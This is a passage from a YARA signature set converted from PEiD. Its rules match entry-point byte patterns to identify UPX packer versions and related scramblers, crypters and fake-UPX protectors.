00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x: PEiD\r\n{\r\n    strings:\r\n        $a = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n        $b = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v060_v061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_06_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 15 00 00 00 80 34 08 ?? E2 FA E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 
07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_040_051_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 21 05 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_083_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0A 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 
8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_101_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0B 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 
83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_090_101_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0B 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? 
?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 07 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_7bit_Scrambler_102: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F 83 FA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_094_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 2B 00 00 00 8D BE D5 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 
00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE D9 00 00 00 8D BE 27 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 
83 CD FF 31 DB 5E 8D BE FA FF 57 66 81 87 81 C6 B3 01 EB 0A 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V3X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 
95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v051: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 8D B0 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0761_pe_exe_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? 
E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F0 01 00 00 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 
00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_121_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 31 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F8 01 00 00 83 CD FF 31 DB EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 
6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5D 8B CD 81 ED 7A 29 40 00 89 AD 0F 6D 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 84 ?? 00 00 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 88 ?? 00 00 61 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 EC 01 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2A 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 56 89 FE 29 C6 F3 A4 5E EB 9F 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 FF D3 11 C9 FF D3 72 F8 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at 